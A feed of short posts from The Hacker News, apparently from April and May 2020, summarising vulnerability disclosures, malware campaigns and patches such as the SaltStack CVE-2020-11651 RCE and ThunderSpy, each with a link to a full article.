During COVID19 pandemic, where many organizations & universities are embracing online learning, researchers discover multiple critical vulnerabilities in 3 widely-used Learning Management System (LMS) plugins for #WordPress sites.

Read more — https://thehackernews.com/2020/04/wordpress-lms-plugins.html

EventBot — A new Android malware spotted in-the-wild steals infected users' BANKING passwords, exfiltrate private DATA, and capture KEYSTROKES to spy on accounts and the content of other apps installed on the targeted devices.

Read: https://thehackernews.com/2020/04/android-banking-keylogger.html

🔥 WARNING — Here’s a new CVSS 10 Bug.

A newly disclosed critical SaltStack RCE (as root) vulnerability (CVE-2020-11651) affects thousands of servers (~6000) deployed in data centers and cloud environments.

Read details — https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html

WARNING — Just within a day after public disclosure of SaltStack RCE vulnerability (CVE-2020-11651), hackers have started exploiting unpatched servers.

✅ LineageOS [hacked]
✅ Ghost CMS [hacked]
✅ DigiCert [hacked]

Read more: https://thehackernews.com/2020/05/saltstack-rce-exploit.html

Now this 👇 is Interesting!

A researcher demonstrated a malware that jumps air-gapped — also audio gapped — devices (PC, servers, IoT, embedded devices) by turning their power-supplies into out-of-band speakers.

Read details + watch demo ➤
https://thehackernews.com/2020/05/air-gap-malware-power-speaker.html

Attention Xiaomi Users!

You Should immediately change the newly introduced PRIVACY setting in your Mi/Mi Pro and Mint browsers to prevent the company from spying on your web history and online activities when browsing in INCOGNITO mode.

Read details:
https://thehackernews.com/2020/05/xiaomi-browser-history.html

{new} 🔥 Watch Out Enterprises!

Citrix ShareFile platform contains critical vulnerabilities that could let unauthenticated attackers steal proprietary, sensitive business data from on-premise storage zone controllers.

Details — https://thehackernews.com/2020/05/citrix-sharefile-vulnerability.html

Facebook launches 'Discover,' a new, yet another, free Internet service in partnership with mobile carriers across the world.

Unlike previous projects, Discover:

✅ Treats all websites equally,
✅ Accesses sites through a secure web proxy,
✅ Lets users browse text-based sites.

Read details:
https://thehackernews.com/2020/05/facebook-discover-free-internet.html

A Chinese APT group has recently been spotted targeting government entities in the Asia-Pacific region as part of a stealthy cyber-espionage campaign that went undetected for the last 5 years.

Read details ➤ https://thehackernews.com/2020/05/asia-pacific-cyber-espionage.html

Digital Ocean — one of the largest modern web hosting companies — recently suffered a data leak incident that exposed some of its customers' data to unauthorized third parties, at least 15 times.

Read more: https://thehackernews.com/2020/05/digitalocean-data-breach.html

⚡ ThunderSpy 🕵️‍♂️

7 new unpatchable hardware vulnerabilities affect all Thunderbolt-equipped computers sold in the last 9 years, letting attackers steal data from encrypted systems—when locked or in sleep mode—through 'evil maid' scenarios.

Read: https://thehackernews.com/2020/05/thunderbolt-vulnerabilities.html

Watch Out !!!

If you are running a vBulletin forum website, make sure to install a newly issued security patch update that fixes an undisclosed critical vulnerability (CVE-2020-12720) in the popular forum software.

Read here: https://thehackernews.com/2020/05/vBulletin-access-vulnerability.html

Over 4000 Android apps are 'unknowingly' leaking sensitive information on their millions of users through misconfigured (publicly accessible) Google cloud-hosted Firebase databases, a recent assessment of just 15,000 apps revealed.

Read details: https://thehackernews.com/2020/05/android-firebase-database-security.html

Kali Linux version 2020.2 has been released with:

✅ KDE Plasma Makeover & Login
✅ PowerShell by Default
✅ Kali on ARM Improvements
✅ Lessons From The Installer Changes
✅ New Key Packages & Icons
✅ Behind the Scenes, Infrastructure Improvements

https://twitter.com/TheHackersNews/status/1260254183644487680

On the 3rd anniversary of global WannaCry ransomware outbreak, U.S. Defense, FBI & CISA released a joint report exposing 3 new sophisticated malware North Korean state-sponsored hackers are using against its targets.

Read more: https://thehackernews.com/2020/05/fbi-north-korean-malware.html

Researcher at ESET spotted a new piece of malware that he claimed to be tailored for attacking computers protected insider "Air‑Gapped networks."

Read more about 'Ramsay malware' —
https://thehackernews.com/2020/05/airgap-network-malware.html

Remember the Reverse RDP Attacks?

A path traversal vulnerability in Windows RDP client that could let a server reversibly compromise a client system that connects to it.

Microsoft issued a patch for it in July 2019, which was bypassed and re-patched in February 2020, which apparently is still incomplete and leaves dozens of 3rd party RDP clients vulnerable that uses Microsoft API function.

https://thehackernews.com/2020/05/reverse-rdp-attack-patch.html

A new variant of COMpfun cyber-espionage malware interprets HTTP status codes to learn what to do with the hacked computers—belonging to diplomatic entities in Europe.

Read more: https://thehackernews.com/2020/05/malware-http-codes.html

This is interesting...

Even a guest account on Windows can brute-force to crack password for any local account, including the administrator, through LogonUserW API because it offers unrestricted login attempts.

Here's a PoC tool: https://github.com/DarkCoderSc/win-brute-logon

A New Impersonation Vulnerability in Bluetooth Exposes Over A Billion Modern Devices to Hackers

Read details: https://thehackernews.com/2020/05/hacking-bluetooth-vulnerability.html